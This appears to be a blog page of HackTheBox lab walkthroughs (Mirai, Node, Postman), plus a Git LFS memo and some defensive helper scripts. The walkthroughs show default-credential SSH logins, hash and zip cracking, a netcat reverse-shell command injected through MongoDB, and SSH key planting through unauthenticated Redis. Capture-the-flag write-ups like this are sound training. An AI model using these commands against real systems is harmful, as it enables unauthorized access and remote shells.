10 Apr 2020
Explanation
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of the box “Mirai”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.48 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-10 09:35 EEST
Nmap scan report for 10.10.10.48
Host is up (0.033s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
1050/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.07 seconds
Gobuster HTTP:
root@kali:~# gobuster dir -u http://10.10.10.48 -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.48
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/04/10 09:37:20 Starting gobuster
===============================================================
/admin (Status: 301)
/swfobject.js (Status: 200)
===============================================================
2020/04/10 09:37:36 Finished
===============================================================
2. Getting User
We found an admin console at http://10.10.10.48/admin/.
The service is Pi-hole.
The default password for Pi-hole is pi:raspberry, and we can use it for the SSH login.
root@kali:~# sshpass -p raspberry ssh pi@10.10.10.48
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Apr 10 06:49:57 2020 from 10.10.14.32
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
pi@raspberrypi:~ $
Now we have the user pi.
user.txt is in the directory /home/pi/Desktop.
pi@raspberrypi:~ $ cat Desktop/user.txt
ff837707441b257a20e32199d7c8838d
3. Getting Root
Using sudo -l, we can find out that we can run any command with root privileges.
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
Switch to root and go to /root.
There is a root.txt, but it says the flag is not here.
root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
Using df -h, we can find out that /dev/sdb is mounted on /media/usbstick.
root@raspberrypi:~# df -h
Filesystem Size Used Avail Use% Mounted on
aufs 8.5G 2.8G 5.3G 34% /
tmpfs 100M 4.8M 96M 5% /run
/dev/sda1 1.3G 1.3G 0 100% /lib/live/mount/persistence/sda1
/dev/loop0 1.3G 1.3G 0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs 250M 0 250M 0% /lib/live/mount/overlay
/dev/sda2 8.5G 2.8G 5.3G 34% /lib/live/mount/persistence/sda2
devtmpfs 10M 0 10M 0% /dev
tmpfs 250M 8.0K 250M 1% /dev/shm
tmpfs 5.0M 4.0K 5.0M 1% /run/lock
tmpfs 250M 0 250M 0% /sys/fs/cgroup
tmpfs 250M 8.0K 250M 1% /tmp
/dev/sdb 8.7M 93K 7.9M 2% /media/usbstick
tmpfs 50M 0 50M 0% /run/user/999
tmpfs 50M 0 50M 0% /run/user/1000
Then, go to /media/usbstick.
There is an interesting file, damnit.txt.
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
It sounds like root.txt has already been deleted.
Since deleting a file only removes its directory entry and leaves the data blocks on the device until they are reused, we can still find the flag by running strings on the raw device.
root@raspberrypi:~# strings /dev/sdb
> r &
/media/usbstick
lost+found
root.txt
damnit.txt
> r &
> r &
/media/usbstick
lost+found
root.txt
damnit.txt
> r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
> r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
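The recovery above works because the deleted file's data blocks are still on the raw device. As an added example (not part of the original walkthrough), the following Python script does the same triage as strings(1) over a raw image and picks out 32-character hex tokens of the kind the flag has; the byte string SAMPLE_IMAGE and its layout are constructed here, and the helper names are my own.

```python
import re
import sys

# Constructed sample of a raw block device: directory entries and the
# contents of two files survive after deletion, surrounded by binary noise.
# Only the layout is modelled on the strings output in the walkthrough.
SAMPLE_IMAGE = (
    b"\x00" * 64
    + b"/media/usbstick\x00lost+found\x00root.txt\x00damnit.txt\x00"
    + b"\x8f\x02\x11>\x00r\x00&\x00" * 3          # junk that strings(1) renders as "> r &"
    + b"\x00" * 32
    + b"3d3e483143ff12ec505d026fa13e020b\n"        # content of the deleted root.txt
    + b"\x00" * 16
    + b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
    + b"Do you know if there is any way to get them back?\n-James\n"
    + b"\xff" * 40
)

HEX32 = re.compile(r"^[0-9a-f]{32}$")   # shape of the flag: 32 lowercase hex characters


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return every run of at least min_len printable ASCII bytes, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e\t]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def unique_in_order(items: list) -> list:
    """Drop repeats but keep first-seen order; ext filesystems hold several copies of directory data."""
    seen = set()
    out = []
    for item in items:
        if item not in seen:
            seen.add(item)
            out.append(item)
    return out


def find_hex32_tokens(strings: list) -> list:
    """Pick out candidate flag values: strings that are exactly 32 hex characters."""
    return [s for s in strings if HEX32.match(s)]


def carve_image(data: bytes) -> dict:
    """Run the whole triage over one raw image and summarise what was recoverable."""
    found = unique_in_order(extract_strings(data))
    return {
        "strings": found,
        "flag_candidates": find_hex32_tokens(found),
        "mentions_root_txt": "root.txt" in found,
    }


if __name__ == "__main__":
    # Usage: python3 carve.py /path/to/image.dd   (defaults to the constructed sample)
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_IMAGE
    summary = carve_image(blob)
    for s in summary["strings"]:
        print(s)
    print("flag candidates:", summary["flag_candidates"])
```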
07 Apr 2020
Explanation
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Node”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.58 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 21:28 EEST
Nmap scan report for 10.10.10.58
Host is up (0.040s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.96 seconds
2. Getting User
We can find a NodeJS website on port 3000.
Using Burp Suite, we can find an interesting HTTP request to “/api/users/latest”.
Then, access the API directly.
We can see the password hashes for the users “tom”, “mark” and “rastating”.
root@kali:~# curl -s http://10.10.10.58:3000/api/users/latest | jq
[
  {
    "_id": "59a7368398aa325cc03ee51d",
    "username": "tom",
    "password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
    "is_admin": false
  },
  {
    "_id": "59a7368e98aa325cc03ee51e",
    "username": "mark",
    "password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
    "is_admin": false
  },
  {
    "_id": "59aa9781cced6f1d1490fce9",
    "username": "rastating",
    "password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
    "is_admin": false
  }
]
Next, try “/api/users”.
We can find an admin user “myP14ceAdm1nAcc0uNT”.
root@kali:~# curl -s http://10.10.10.58:3000/api/users/ | jq
[
  {
    "_id": "59a7365b98aa325cc03ee51c",
    "username": "myP14ceAdm1nAcc0uNT",
    "password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
    "is_admin": true
  },
  {
    "_id": "59a7368398aa325cc03ee51d",
    "username": "tom",
    "password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
    "is_admin": false
  },
  {
    "_id": "59a7368e98aa325cc03ee51e",
    "username": "mark",
    "password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
    "is_admin": false
  },
  {
    "_id": "59aa9781cced6f1d1490fce9",
    "username": "rastating",
    "password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
    "is_admin": false
  }
]
We can crack the password hash using Crackstation.net.
The cracked password is “manchester”.
We can download a file “myplace.backup”, which is base64 encoded.
Decode it with the base64 command.
root@kali:~# cat myplace.backup | base64 --decode > myplace
root@kali:~# file myplace
myplace: Zip archive data, at least v1.0 to extract
Since the zip file is password protected, try to brute-force using “fcrackzip”.
The password is “magicword”.
root@kali:~# unzip myplace
Archive: myplace
[myplace] var/www/myplace/package-lock.json password:
root@kali:~# fcrackzip -D -p /usr/share/wordlists/rockyou.txt myplace
possible pw found: magicword ()
Then, unzip the archive.
It looks like the source code of a NodeJS web application.
root@kali:~# unzip myplace
Archive: myplace
[myplace] var/www/myplace/package-lock.json password:
inflating: var/www/myplace/package-lock.json
inflating: var/www/myplace/node_modules/serve-static/README.md
inflating: var/www/myplace/node_modules/serve-static/index.js
---
Take a look at the source code.
In “/var/www/myplace/app.js”, we can find a MongoDB credential for the user “mark”.
root@kali:~/var/www/myplace# cat app.js | grep mongo
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
console.log('[!] Failed to connect to mongodb');
We can reuse this credential for the SSH connection.
mark:5AYRft73VtFpc84k
root@kali:~# ssh mark@10.10.10.58
mark@10.10.10.58's password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$ id
uid=1001(mark) gid=1001(mark) groups=1001(mark)
However, we are still not able to get user.txt.
There are two other users.
mark@node:/home$ ls -l
total 12
drwxr-xr-x 2 root root 4096 Aug 31 2017 frank
drwxr-xr-x 3 root root 4096 Sep 3 2017 mark
drwxr-xr-x 6 root root 4096 Sep 3 2017 tom
If we take a look at the processes, we can see two processes owned by another user, “tom”.
mark@node:~$ ps aux | grep tom
tom 1211 0.0 5.8 1074616 44232 ? Ssl 19:31 0:03 /usr/bin/node /var/scheduler/app.js
tom 1231 0.0 6.6 1024156 50068 ? Ssl 19:31 0:04 /usr/bin/node /var/www/myplace/app.js
mark 1610 0.0 0.1 14228 1020 pts/0 S+ 23:05 0:00 grep --color=auto tom
Using the following command, we can access the MongoDB command-line interface.
It is also possible to insert a task containing a reverse shell command.
mark@node:~$ mongo -u mark -p 5AYRft73VtFpc84k localhost/scheduler
MongoDB shell version: 3.2.16
connecting to: localhost/scheduler
> db.tasks.insertOne({ cmd: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/bin/nc 10.10.14.6 4444 >/tmp/f" });
{
  "acknowledged" : true,
  "insertedId" : ObjectId("5e8b80f878ddbff46dfcb0d7")
}
> exit
bye
Launch a netcat listener.
root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
After a few minutes, we can get a reverse shell as user “tom”.
root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.58] 38860
bash: cannot set terminal process group (1230): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
tom@node:/$ id
id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
user.txt is in the directory “/home/tom”.
tom@node:/$ cd /home/tom
cd /home/tom
tom@node:~$ ls
ls
user.txt
tom@node:~$ cat user.txt
cat user.txt
e1156acc3574e04b06908ecf76be91b1
3. Getting Root
With the following command, we can find a SUID binary “/usr/local/bin/backup”.
tom@node:/tmp$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/bin/backup
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newuidmap
/bin/ping
/bin/umount
/bin/fusermount
/bin/ping6
/bin/ntfs-3g
/bin/su
/bin/mount
Also, we can see how this executable is used by the previous script “/var/www/myplace/app.js”.
The “backup_key” is also in this code.
app.get('/api/admin/backup', function (req, res) {
  if (req.session.user && req.session.user.is_admin) {
    var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
    var backup = '';
This time, we can bypass the binary's filter in the following way.
tom@node:/tmp$ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "/roo \t /roo \t .txt" | base64 -d > /tmp/flag.zip
tom@node:/tmp$ unzip -P magicword flag.zip
unzip -P magicword flag.zip
Archive: flag.zip
extracting: root/root.txt
Now we have extracted root.txt.
tom@node:/tmp$ cat root/root.txt
cat root/root.txt
1722e99ca5f353b362556a62bd5e6be0
05 Apr 2020
Explanation
Git Large File Storage (Git LFS) is an extension that replaces binary files with text pointers inside the Git repository.
This is a memo on enabling Git LFS on GitHub.
Environment
Reference
Package installation
root@kali:~# git lfs install
Git LFS initialized.
Tracking PNG files
We need the following command to track .png files.
$ git lfs track "*.png"
Tracking "*.png"
We can confirm that we now have a “.gitattributes” file with an entry for “.png” files.
$ cat .gitattributes
*.png filter=lfs diff=lfs merge=lfs -text
After that, we need to commit these files again.
$ git status
On branch Github-LFS
Changes not staged for commit:
(use "git add <file>..." to update what will be committed)
(use "git restore <file>..." to discard changes in working directory)
modified: public/images/2017-09-21/gcc-1.png
modified: public/images/2017-09-21/gcc-2.png
modified: public/images/2017-09-21/gcc-3.png
modified: public/images/2018-12-01/2018-12-05-09-49-17.png
modified: public/images/2018-12-01/2018-12-05-09-50-24.png
---
Then, commit and push the branch.
We see some diagnostic information about the .png file upload.
$ git push origin Github-LFS
---
Uploading LFS objects: ... (0/310), 21 MB | 965 KB/s
Enumerating objects: 761, done.
Counting objects: 100% (761/761), done.
Delta compression using up to 8 threads
Compressing objects: 100% (376/376), done.
Writing objects: 100% (385/385), 50.71 KiB | 1.37 MiB/s, done.
Total 385 (delta 5), reused 0 (delta 0)
---
Alternatively, we can use the “git lfs migrate” command.
$ git lfs migrate import --include="*.png"
migrate: override changes in your working copy? [Y/n] Y
migrate: changes in your working copy will be overridden ...
migrate: Fetching remote refs: ..., done.
migrate: Sorting commits: ..., done.
migrate: Rewriting commits: 100% (2/2), done.
master 33de649d04553205a0db99802b2b965459e284ce -> cb1533f0115d4a0caaa691b9c6eff20a73670e0a
migrate: Updating refs: ..., done.
migrate: checkout: ..., done.
After the migration, we need to run the following commands to remove the pre-existing objects from the local repository.
$ git reflog expire --expire-unreachable=now --all
$ git gc --prune=now
Enumerating objects: 3197, done.
Counting objects: 100% (3197/3197), done.
Delta compression using up to 8 threads
Compressing objects: 100% (1526/1526), done.
Writing objects: 100% (3197/3197), done.
Total 3197 (delta 1642), reused 3197 (delta 1642)
Now we can see that our binary file is managed by Git LFS.
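What Git now stores for each .png is a small text pointer; the real bytes live on the LFS server and are only trusted if they match the pointer. As an added example (not part of the original memo), the following Python parses and validates a pointer in the spec/v1 format and checks a downloaded blob against it; SAMPLE_BLOB is a constructed stand-in for a PNG, not a real image, and the function names are my own.

```python
import hashlib
import re

POINTER_VERSION = "https://git-lfs.github.com/spec/v1"
OID_RE = re.compile(r"^sha256:([0-9a-f]{64})$")

# Constructed sample: a stand-in for a PNG (not a real image) and the pointer
# Git keeps in the tree in its place once "*.png filter=lfs" is active.
SAMPLE_BLOB = b"\x89PNG\r\n\x1a\n" + bytes(range(256)) * 2
SAMPLE_POINTER = (
    f"version {POINTER_VERSION}\n"
    f"oid sha256:{hashlib.sha256(SAMPLE_BLOB).hexdigest()}\n"
    f"size {len(SAMPLE_BLOB)}\n"
)


def make_pointer(blob: bytes) -> str:
    """Build the pointer text the lfs clean filter writes for a blob."""
    return f"version {POINTER_VERSION}\noid sha256:{hashlib.sha256(blob).hexdigest()}\nsize {len(blob)}\n"


def parse_pointer(text: str) -> dict:
    """Parse and validate a Git LFS pointer file; raise ValueError on anything off-spec."""
    if len(text.encode()) >= 1024 or not text.endswith("\n"):
        raise ValueError("pointer must be under 1024 bytes and end with a newline")
    lines = text.splitlines()
    fields = {}
    for line in lines:
        key, sep, value = line.partition(" ")
        if not sep or not key or key in fields:
            raise ValueError(f"malformed or duplicate line: {line!r}")
        fields[key] = value
    if lines[0] != f"version {POINTER_VERSION}":
        raise ValueError("first line must be the version line")
    # the spec requires the remaining keys in ascending alphabetical order
    if [l.split(" ", 1)[0] for l in lines[1:]] != sorted(k for k in fields if k != "version"):
        raise ValueError("keys after version must be in ascending order")
    m = OID_RE.match(fields.get("oid", ""))
    if not m:
        raise ValueError("oid must be 'sha256:<64 hex>'")
    if not fields.get("size", "").isdigit():
        raise ValueError("size must be a non-negative integer")
    return {"oid": m.group(1), "size": int(fields["size"])}


def is_pointer(data: bytes) -> bool:
    """Cheap check whether a blob in the tree is a pointer rather than real content."""
    try:
        parse_pointer(data.decode("utf-8"))
        return True
    except (UnicodeDecodeError, ValueError, IndexError):
        return False


def verify_blob(pointer_text: str, blob: bytes) -> bool:
    """Check downloaded content against its pointer: size first, then the sha256."""
    p = parse_pointer(pointer_text)
    return len(blob) == p["size"] and hashlib.sha256(blob).hexdigest() == p["oid"]


if __name__ == "__main__":
    print(SAMPLE_POINTER, end="")
    print("blob matches pointer:", verify_blob(SAMPLE_POINTER, SAMPLE_BLOB))
```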
16 Mar 2020
Explanation
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Postman”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.160 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-14 18:54 EET
Nmap scan report for 10.10.10.160
Host is up (0.043s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.81 seconds
Gobuster HTTP:
root@kali:~# gobuster dir -u http://10.10.10.160 -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.160
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/14 18:59:56 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/upload (Status: 301)
===============================================================
2020/03/14 19:00:16 Finished
===============================================================
Redis enumeration:
Reference: https://book.hacktricks.xyz/pentesting/6379-pentesting-redis
1n4r1@kali:~$ redis-cli -h 10.10.10.160
10.10.10.160:6379> info
# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:9435c3c2879311f3
redis_mode:standalone
os:Linux 4.15.0-58-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:7.4.0
process_id:616
run_id:521dd2981efd190099f6fdc8744a20a1b3217664
tcp_port:6379
uptime_in_seconds:444
uptime_in_days:0
hz:10
lru_clock:7323466
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf
---
10.10.10.160:6379> keys *
(empty list or set)
10.10.10.160:6379> config get *
1) "dbfilename"
2) "dump.rdb"
3) "requirepass"
4) ""
5) "masterauth"
6) ""
7) "cluster-announce-ip"
8) ""
9) "unixsocket"
---
2. Summary
Port 22: OpenSSH running
Port 80: HTTP website running with Apache
Port 6379: Redis 4.0.9 running (anonymous access allowed)
Port 10000: Webmin httpd running
3. Getting User
Since we have access to Redis, we can enumerate the file system in the following way.
As you can see, if we set a non-existent directory, it reports “No such file or directory”.
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir /var/lib/redis/non-exist-directory
(error) ERR Changing directory: No such file or directory
This way, we can confirm that there is an .ssh directory in the home directory of the redis user.
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379>
Next, try to upload a public key for SSH.
root@kali:~# (echo -e "\n\n"; cat .ssh/id_rsa.pub; echo -e "\n\n") > pubkey.txt
root@kali:~# cat pubkey.txt | redis-cli -h 10.10.10.160 -x set pubkey
OK
After that, save the key as “/var/lib/redis/.ssh/authorized_keys”.
root@kali:~# redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379>
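The file write above depends on three things a defender can audit: an empty requirepass, a dir that can be pointed at any directory, and a dbfilename that need not be an .rdb file. As an added example (not part of the original walkthrough), the following Python audits the flat key/value list that redis-cli's CONFIG GET * returns; the sample lists are constructed, the protected-mode and bind values in them are assumptions since the page's output is truncated, and the hardened secret is a placeholder.

```python
import posixpath

EXPECTED_DIR = "/var/lib/redis"

# Constructed samples of the alternating key/value list CONFIG GET * returns.
# AS_FOUND mirrors the values seen on the target (empty requirepass, default
# dir and dbfilename); protected-mode and bind are assumed. AFTER_WRITE is the
# state after the dir/dbfilename change that drops an authorized_keys file.
AS_FOUND = ["dbfilename", "dump.rdb", "requirepass", "", "masterauth", "",
            "dir", "/var/lib/redis", "protected-mode", "no", "bind", "0.0.0.0"]
AFTER_WRITE = ["dbfilename", "authorized_keys", "requirepass", "", "masterauth", "",
               "dir", "/var/lib/redis/.ssh", "protected-mode", "no", "bind", "0.0.0.0"]
HARDENED = ["dbfilename", "dump.rdb", "requirepass", "<long-random-secret>",  # placeholder
            "dir", "/var/lib/redis", "protected-mode", "yes", "bind", "127.0.0.1"]


def pairs_to_config(flat: list) -> dict:
    """Turn CONFIG GET's alternating key/value list into a dict."""
    if len(flat) % 2:
        raise ValueError("CONFIG GET output must be key/value pairs")
    return dict(zip(flat[0::2], flat[1::2]))


def audit_redis_config(flat: list, expected_dir: str = EXPECTED_DIR) -> list:
    """Return a list of findings; an empty list means nothing looked wrong."""
    cfg = pairs_to_config(flat)
    findings = []
    if cfg.get("requirepass", "") == "":
        findings.append("requirepass is empty: anyone who can reach the port has full access")
    if cfg.get("protected-mode", "yes") != "yes":
        findings.append("protected-mode is off")
    binds = cfg.get("bind", "").split()
    if not binds or "0.0.0.0" in binds or "*" in binds:
        findings.append("bound to all interfaces")
    # dir must stay inside the data directory and never point at a dotdir
    d = posixpath.normpath(cfg.get("dir", expected_dir))
    outside = d != expected_dir and not d.startswith(expected_dir + "/")
    hidden = any(part.startswith(".") for part in d.split("/") if part)
    if outside or hidden:
        findings.append(f"dir {d!r} is outside {expected_dir} or is a hidden directory")
    # a non-.rdb dbfilename means SAVE would write something other than a dump
    name = cfg.get("dbfilename", "dump.rdb")
    if not name.endswith(".rdb"):
        findings.append(f"dbfilename {name!r} is not an .rdb file: SAVE would write {posixpath.join(d, name)}")
    return findings


if __name__ == "__main__":
    for label, sample in (("as found", AS_FOUND), ("after write", AFTER_WRITE), ("hardened", HARDENED)):
        print(label, "->", audit_redis_config(sample) or ["ok"])
```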
Now we can SSH into the server as the user redis.
However, there is no “user.txt” in the home directory of the redis user.
root@kali:~# ssh redis@10.10.10.160
The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
ECDSA key fingerprint is SHA256:kea9iwskZTAT66U8yNRQiTa6t35LX8p0jOpTfvgeCh0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.160' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)
redis@Postman:~$
With some enumeration, we can find an interesting file “id_rsa.bak” in the “/opt” directory.
redis@Postman:~$ ls /opt/
id_rsa.bak
redis@Postman:~$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
-----END RSA PRIVATE KEY-----
redis@Postman:~$
Try to download with scp.
root@kali:~# scp redis@10.10.10.160:/opt/id_rsa.bak /root
id_rsa.bak 100% 1743 38.3KB/s 00:00
root@kali:~#
Kali Linux can brute-force the passphrase of an SSH private key with John the Ripper.
However, we first need to convert the SSH private key into a hash format that John the Ripper can crack.
Cracking it with “rockyou.txt” gives us a password “computer2008” for some user.
root@kali:~# /usr/share/john/ssh2john.py id_rsa.bak > hash.txt
root@kali:~# john hash.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (id_rsa.bak)
Warning: Only 2 candidates left, minimum 8 needed for performance.
